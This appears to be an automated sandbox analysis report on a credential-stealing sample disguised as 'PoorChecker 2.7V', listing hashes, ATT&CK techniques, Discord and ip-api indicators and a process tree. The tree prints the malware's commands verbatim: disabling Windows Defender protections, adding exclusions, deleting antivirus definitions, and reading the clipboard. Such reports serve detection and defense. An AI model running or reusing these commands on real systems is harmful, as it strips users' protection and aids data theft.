36d76bec8aab1199c777bc14e10a0cf02411d3eefe1116c8a7b6a6aef6a2678c

Analysis

max time kernel
140s
max time network
150s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
16-11-2024 18:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PoorChecker 2.7V.rar
Size

27.3MB
MD5

b953de35b7b2f8437c0ab6a5caaa77e7
SHA1

a87d7c8dfcca9edf95901a7d82f8d6e561b37145
SHA256

36d76bec8aab1199c777bc14e10a0cf02411d3eefe1116c8a7b6a6aef6a2678c
SHA512

a901d3d9897777830c60de63055e40e1e7e60b64390d5f3dddf2ac4bf7747a644c3fd253bd52ba60e0ed69f88b84351db87a163a427e70752330075dcb16a982
SSDEEP

786432:hANzjbwx2YTFeTcFz1dZk1/OZlaMGnsPc7Wlq:KNz3Q2GFgcFzzZ6zMLLs

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5944	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1276	powershell.exe
5228	powershell.exe
1568	powershell.exe
1612	powershell.exe
2916	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3004	cmd.exe
5112	powershell.exe

Executes dropped EXE 12 IoCs

pid	Process
1764	PoorChecker.exe
3216	PoorChecker.exe
1580	PoorChecker.exe
3992	PoorChecker.exe
2960	PoorChecker.exe
544	PoorChecker.exe
5180	PoorChecker.exe
5376	PoorChecker.exe
5528	PoorChecker.exe
5708	PoorChecker.exe
5276	elevate.exe
5688	rar.exe

Loads dropped DLL 64 IoCs

pid	Process
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3216	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
3992	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
544	PoorChecker.exe
5708	PoorChecker.exe
5708	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe
5708	PoorChecker.exe
5376	PoorChecker.exe
5708	PoorChecker.exe
5376	PoorChecker.exe
5376	PoorChecker.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
44	discord.com
45	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3120	tasklist.exe
4624	tasklist.exe
4116	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000045084-30.dat	upx
behavioral1/memory/3216-34-0x00007FFB2C390000-0x00007FFB2C978000-memory.dmp	upx
behavioral1/memory/3216-39-0x00007FFB2CC10000-0x00007FFB2CC34000-memory.dmp	upx
behavioral1/files/0x0028000000045077-37.dat	upx
behavioral1/files/0x0028000000045082-38.dat	upx
behavioral1/files/0x002800000004507e-56.dat	upx
behavioral1/memory/3216-57-0x00007FFB41DC0000-0x00007FFB41DCF000-memory.dmp	upx
behavioral1/files/0x002800000004507d-55.dat	upx
behavioral1/files/0x002800000004507c-54.dat	upx
behavioral1/files/0x002800000004507b-53.dat	upx
behavioral1/files/0x002800000004507a-52.dat	upx
behavioral1/files/0x0028000000045079-51.dat	upx
behavioral1/files/0x0028000000045078-50.dat	upx
behavioral1/files/0x0028000000045076-49.dat	upx
behavioral1/files/0x0028000000045089-48.dat	upx
behavioral1/files/0x0028000000045088-47.dat	upx
behavioral1/files/0x0028000000045087-46.dat	upx
behavioral1/files/0x0028000000045083-43.dat	upx
behavioral1/files/0x0028000000045081-42.dat	upx
behavioral1/memory/3216-63-0x00007FFB2C360000-0x00007FFB2C38D000-memory.dmp	upx
behavioral1/memory/3216-67-0x00007FFB2C310000-0x00007FFB2C333000-memory.dmp	upx
behavioral1/memory/3216-69-0x00007FFB2C030000-0x00007FFB2C1A3000-memory.dmp	upx
behavioral1/memory/3216-65-0x00007FFB2C340000-0x00007FFB2C359000-memory.dmp	upx
behavioral1/memory/3216-73-0x00007FFB40E30000-0x00007FFB40E3D000-memory.dmp	upx
behavioral1/memory/3216-72-0x00007FFB3CB60000-0x00007FFB3CB79000-memory.dmp	upx
behavioral1/memory/3216-81-0x00007FFB2C1B0000-0x00007FFB2C268000-memory.dmp	upx
behavioral1/memory/3216-80-0x00007FFB2BCB0000-0x00007FFB2C025000-memory.dmp	upx
behavioral1/memory/3216-87-0x00007FFB40CE0000-0x00007FFB40CED000-memory.dmp	upx
behavioral1/memory/3216-86-0x00007FFB2BC90000-0x00007FFB2BCA4000-memory.dmp	upx
behavioral1/memory/3216-91-0x00007FFB2BB70000-0x00007FFB2BC8C000-memory.dmp	upx
behavioral1/memory/3216-85-0x00007FFB2CC10000-0x00007FFB2CC34000-memory.dmp	upx
behavioral1/memory/3216-78-0x00007FFB2C2E0000-0x00007FFB2C30E000-memory.dmp	upx
behavioral1/memory/3216-77-0x00007FFB2C390000-0x00007FFB2C978000-memory.dmp	upx
behavioral1/memory/3992-119-0x00007FFB27AE0000-0x00007FFB280C8000-memory.dmp	upx
behavioral1/memory/3992-145-0x00007FFB3F5A0000-0x00007FFB3F5AF000-memory.dmp	upx
behavioral1/memory/3216-144-0x00007FFB2C030000-0x00007FFB2C1A3000-memory.dmp	upx
behavioral1/memory/3992-143-0x00007FFB27A90000-0x00007FFB27AB4000-memory.dmp	upx
behavioral1/memory/3216-129-0x00007FFB2C310000-0x00007FFB2C333000-memory.dmp	upx
behavioral1/memory/3992-180-0x00007FFB26160000-0x00007FFB2618D000-memory.dmp	upx
behavioral1/memory/3216-181-0x00007FFB2BCB0000-0x00007FFB2C025000-memory.dmp	upx
behavioral1/memory/3216-184-0x00007FFB2C2E0000-0x00007FFB2C30E000-memory.dmp	upx
behavioral1/memory/3992-187-0x00007FFB25CE0000-0x00007FFB25E53000-memory.dmp	upx
behavioral1/memory/3216-186-0x00007FFB2C1B0000-0x00007FFB2C268000-memory.dmp	upx
behavioral1/memory/3992-190-0x00007FFB25CB0000-0x00007FFB25CDE000-memory.dmp	upx
behavioral1/memory/3992-189-0x00007FFB3D1D0000-0x00007FFB3D1DD000-memory.dmp	upx
behavioral1/memory/3992-205-0x00007FFB25BF0000-0x00007FFB25CA8000-memory.dmp	upx
behavioral1/memory/3992-215-0x00007FFB27AE0000-0x00007FFB280C8000-memory.dmp	upx
behavioral1/memory/3992-219-0x00007FFB3F5A0000-0x00007FFB3F5AF000-memory.dmp	upx
behavioral1/memory/3992-230-0x00007FFB21250000-0x00007FFB215C5000-memory.dmp	upx
behavioral1/memory/3992-231-0x00007FFB25BF0000-0x00007FFB25CA8000-memory.dmp	upx
behavioral1/memory/3992-229-0x00007FFB25CB0000-0x00007FFB25CDE000-memory.dmp	upx
behavioral1/memory/3992-228-0x00007FFB3D1D0000-0x00007FFB3D1DD000-memory.dmp	upx
behavioral1/memory/3992-227-0x00007FFB260D0000-0x00007FFB260E9000-memory.dmp	upx
behavioral1/memory/3992-225-0x00007FFB260F0000-0x00007FFB26113000-memory.dmp	upx
behavioral1/memory/3992-224-0x00007FFB26120000-0x00007FFB26139000-memory.dmp	upx
behavioral1/memory/3992-220-0x00007FFB27AE0000-0x00007FFB280C8000-memory.dmp	upx
behavioral1/memory/3992-218-0x00007FFB3CC80000-0x00007FFB3CC8D000-memory.dmp	upx
behavioral1/memory/3992-217-0x00007FFB25BD0000-0x00007FFB25BE4000-memory.dmp	upx
behavioral1/memory/3992-216-0x00007FFB27A90000-0x00007FFB27AB4000-memory.dmp	upx
behavioral1/memory/3992-226-0x00007FFB25CE0000-0x00007FFB25E53000-memory.dmp	upx
behavioral1/memory/3992-223-0x00007FFB26160000-0x00007FFB2618D000-memory.dmp	upx
behavioral1/memory/3992-221-0x00007FFB27A90000-0x00007FFB27AB4000-memory.dmp	upx
behavioral1/memory/3992-203-0x00007FFB21250000-0x00007FFB215C5000-memory.dmp	upx
behavioral1/memory/3216-191-0x00007FFB2BB70000-0x00007FFB2BC8C000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\be37c004-e4c6-4319-b628-98ecfae42671.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241116184007.pma	setup.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	elevate.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
408	cmd.exe
3432	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2916	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2436	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133762559176570021"	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4140	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
1612	powershell.exe
1612	powershell.exe
3172	WMIC.exe
3172	WMIC.exe
3172	WMIC.exe
3172	WMIC.exe
1276	powershell.exe
1276	powershell.exe
1612	powershell.exe
1612	powershell.exe
2916	powershell.exe
2916	powershell.exe
5112	powershell.exe
5112	powershell.exe
1568	powershell.exe
1568	powershell.exe
5112	powershell.exe
1276	powershell.exe
2916	powershell.exe
1568	powershell.exe
5228	powershell.exe
5228	powershell.exe
5228	powershell.exe
5360	powershell.exe
5360	powershell.exe
5360	powershell.exe
3040	WMIC.exe
3040	WMIC.exe
3040	WMIC.exe
3040	WMIC.exe
5600	WMIC.exe
5600	WMIC.exe
5600	WMIC.exe
5600	WMIC.exe
5220	WMIC.exe
5220	WMIC.exe
5220	WMIC.exe
5220	WMIC.exe
1568	powershell.exe
1568	powershell.exe
1568	powershell.exe
2916	WMIC.exe
2916	WMIC.exe
2916	WMIC.exe
2916	WMIC.exe
3892	powershell.exe
3892	powershell.exe
3892	powershell.exe
4440	chrome.exe
4440	chrome.exe
5428	msedge.exe
5428	msedge.exe
3252	msedge.exe
3252	msedge.exe
5176	identity_helper.exe
5176	identity_helper.exe
5368	msedge.exe
5368	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3652	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3652	7zFM.exe
Token: 35	3652	7zFM.exe
Token: SeSecurityPrivilege	3652	7zFM.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	4624	tasklist.exe
Token: SeDebugPrivilege	3120	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3172	WMIC.exe
Token: SeSecurityPrivilege	3172	WMIC.exe
Token: SeTakeOwnershipPrivilege	3172	WMIC.exe
Token: SeLoadDriverPrivilege	3172	WMIC.exe
Token: SeSystemProfilePrivilege	3172	WMIC.exe
Token: SeSystemtimePrivilege	3172	WMIC.exe
Token: SeProfSingleProcessPrivilege	3172	WMIC.exe
Token: SeIncBasePriorityPrivilege	3172	WMIC.exe
Token: SeCreatePagefilePrivilege	3172	WMIC.exe
Token: SeBackupPrivilege	3172	WMIC.exe
Token: SeRestorePrivilege	3172	WMIC.exe
Token: SeShutdownPrivilege	3172	WMIC.exe
Token: SeDebugPrivilege	3172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3172	WMIC.exe
Token: SeRemoteShutdownPrivilege	3172	WMIC.exe
Token: SeUndockPrivilege	3172	WMIC.exe
Token: SeManageVolumePrivilege	3172	WMIC.exe
Token: 33	3172	WMIC.exe
Token: 34	3172	WMIC.exe
Token: 35	3172	WMIC.exe
Token: 36	3172	WMIC.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	4116	tasklist.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeIncreaseQuotaPrivilege	3172	WMIC.exe
Token: SeSecurityPrivilege	3172	WMIC.exe
Token: SeTakeOwnershipPrivilege	3172	WMIC.exe
Token: SeLoadDriverPrivilege	3172	WMIC.exe
Token: SeSystemProfilePrivilege	3172	WMIC.exe
Token: SeSystemtimePrivilege	3172	WMIC.exe
Token: SeProfSingleProcessPrivilege	3172	WMIC.exe
Token: SeIncBasePriorityPrivilege	3172	WMIC.exe
Token: SeCreatePagefilePrivilege	3172	WMIC.exe
Token: SeBackupPrivilege	3172	WMIC.exe
Token: SeRestorePrivilege	3172	WMIC.exe
Token: SeShutdownPrivilege	3172	WMIC.exe
Token: SeDebugPrivilege	3172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3172	WMIC.exe
Token: SeRemoteShutdownPrivilege	3172	WMIC.exe
Token: SeUndockPrivilege	3172	WMIC.exe
Token: SeManageVolumePrivilege	3172	WMIC.exe
Token: 33	3172	WMIC.exe
Token: 34	3172	WMIC.exe
Token: 35	3172	WMIC.exe
Token: 36	3172	WMIC.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeIncreaseQuotaPrivilege	1612	powershell.exe
Token: SeSecurityPrivilege	1612	powershell.exe
Token: SeTakeOwnershipPrivilege	1612	powershell.exe
Token: SeLoadDriverPrivilege	1612	powershell.exe
Token: SeSystemProfilePrivilege	1612	powershell.exe
Token: SeSystemtimePrivilege	1612	powershell.exe
Token: SeProfSingleProcessPrivilege	1612	powershell.exe
Token: SeIncBasePriorityPrivilege	1612	powershell.exe
Token: SeCreatePagefilePrivilege	1612	powershell.exe
Token: SeBackupPrivilege	1612	powershell.exe
Token: SeRestorePrivilege	1612	powershell.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
3652	7zFM.exe
3652	7zFM.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe
3252	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1764 wrote to memory of 3216	1764	PoorChecker.exe	95
PID 1764 wrote to memory of 3216	1764	PoorChecker.exe	95
PID 3216 wrote to memory of 996	3216	PoorChecker.exe	96
PID 3216 wrote to memory of 996	3216	PoorChecker.exe	96
PID 3216 wrote to memory of 636	3216	PoorChecker.exe	97
PID 3216 wrote to memory of 636	3216	PoorChecker.exe	97
PID 3216 wrote to memory of 2996	3216	PoorChecker.exe	100
PID 3216 wrote to memory of 2996	3216	PoorChecker.exe	100
PID 996 wrote to memory of 1612	996	cmd.exe	102
PID 996 wrote to memory of 1612	996	cmd.exe	102
PID 3216 wrote to memory of 1120	3216	PoorChecker.exe	103
PID 3216 wrote to memory of 1120	3216	PoorChecker.exe	103
PID 3216 wrote to memory of 4932	3216	PoorChecker.exe	104
PID 3216 wrote to memory of 4932	3216	PoorChecker.exe	104
PID 1580 wrote to memory of 3992	1580	PoorChecker.exe	108
PID 1580 wrote to memory of 3992	1580	PoorChecker.exe	108
PID 3216 wrote to memory of 1056	3216	PoorChecker.exe	149
PID 3216 wrote to memory of 1056	3216	PoorChecker.exe	149
PID 3216 wrote to memory of 3004	3216	PoorChecker.exe	111
PID 3216 wrote to memory of 3004	3216	PoorChecker.exe	111
PID 3216 wrote to memory of 3800	3216	PoorChecker.exe	113
PID 3216 wrote to memory of 3800	3216	PoorChecker.exe	113
PID 3216 wrote to memory of 4656	3216	PoorChecker.exe	115
PID 3216 wrote to memory of 4656	3216	PoorChecker.exe	115
PID 4932 wrote to memory of 4624	4932	cmd.exe	116
PID 4932 wrote to memory of 4624	4932	cmd.exe	116
PID 1120 wrote to memory of 3120	1120	cmd.exe	117
PID 1120 wrote to memory of 3120	1120	cmd.exe	117
PID 3216 wrote to memory of 408	3216	PoorChecker.exe	118
PID 3216 wrote to memory of 408	3216	PoorChecker.exe	118
PID 3216 wrote to memory of 2456	3216	PoorChecker.exe	120
PID 3216 wrote to memory of 2456	3216	PoorChecker.exe	120
PID 3216 wrote to memory of 812	3216	PoorChecker.exe	123
PID 3216 wrote to memory of 812	3216	PoorChecker.exe	123
PID 636 wrote to memory of 1276	636	cmd.exe	125
PID 636 wrote to memory of 1276	636	cmd.exe	125
PID 2996 wrote to memory of 2916	2996	cmd.exe	126
PID 2996 wrote to memory of 2916	2996	cmd.exe	126
PID 3004 wrote to memory of 5112	3004	cmd.exe	127
PID 3004 wrote to memory of 5112	3004	cmd.exe	127
PID 1056 wrote to memory of 3172	1056	cmd.exe	129
PID 1056 wrote to memory of 3172	1056	cmd.exe	129
PID 3800 wrote to memory of 4116	3800	cmd.exe	130
PID 3800 wrote to memory of 4116	3800	cmd.exe	130
PID 2960 wrote to memory of 544	2960	PoorChecker.exe	131
PID 2960 wrote to memory of 544	2960	PoorChecker.exe	131
PID 4656 wrote to memory of 4744	4656	cmd.exe	132
PID 4656 wrote to memory of 4744	4656	cmd.exe	132
PID 408 wrote to memory of 3432	408	cmd.exe	133
PID 408 wrote to memory of 3432	408	cmd.exe	133
PID 2456 wrote to memory of 2436	2456	cmd.exe	134
PID 2456 wrote to memory of 2436	2456	cmd.exe	134
PID 812 wrote to memory of 1568	812	cmd.exe	135
PID 812 wrote to memory of 1568	812	cmd.exe	135
PID 5180 wrote to memory of 5376	5180	PoorChecker.exe	137
PID 5180 wrote to memory of 5376	5180	PoorChecker.exe	137
PID 3216 wrote to memory of 5416	3216	PoorChecker.exe	138
PID 3216 wrote to memory of 5416	3216	PoorChecker.exe	138
PID 5528 wrote to memory of 5708	5528	PoorChecker.exe	141
PID 5528 wrote to memory of 5708	5528	PoorChecker.exe	141
PID 5416 wrote to memory of 5872	5416	cmd.exe	142
PID 5416 wrote to memory of 5872	5416	cmd.exe	142
PID 3216 wrote to memory of 4528	3216	PoorChecker.exe	144
PID 3216 wrote to memory of 4528	3216	PoorChecker.exe	144

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\PoorChecker 2.7V.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3652

C:\Users\Admin\Desktop\PoorChecker.exe
"C:\Users\Admin\Desktop\PoorChecker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1764
- C:\Users\Admin\Desktop\PoorChecker.exe
  "C:\Users\Admin\Desktop\PoorChecker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\PoorChecker.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\PoorChecker.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1276
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1120
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1056
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4656
  - - C:\Windows\system32\tree.com
      tree /A /F
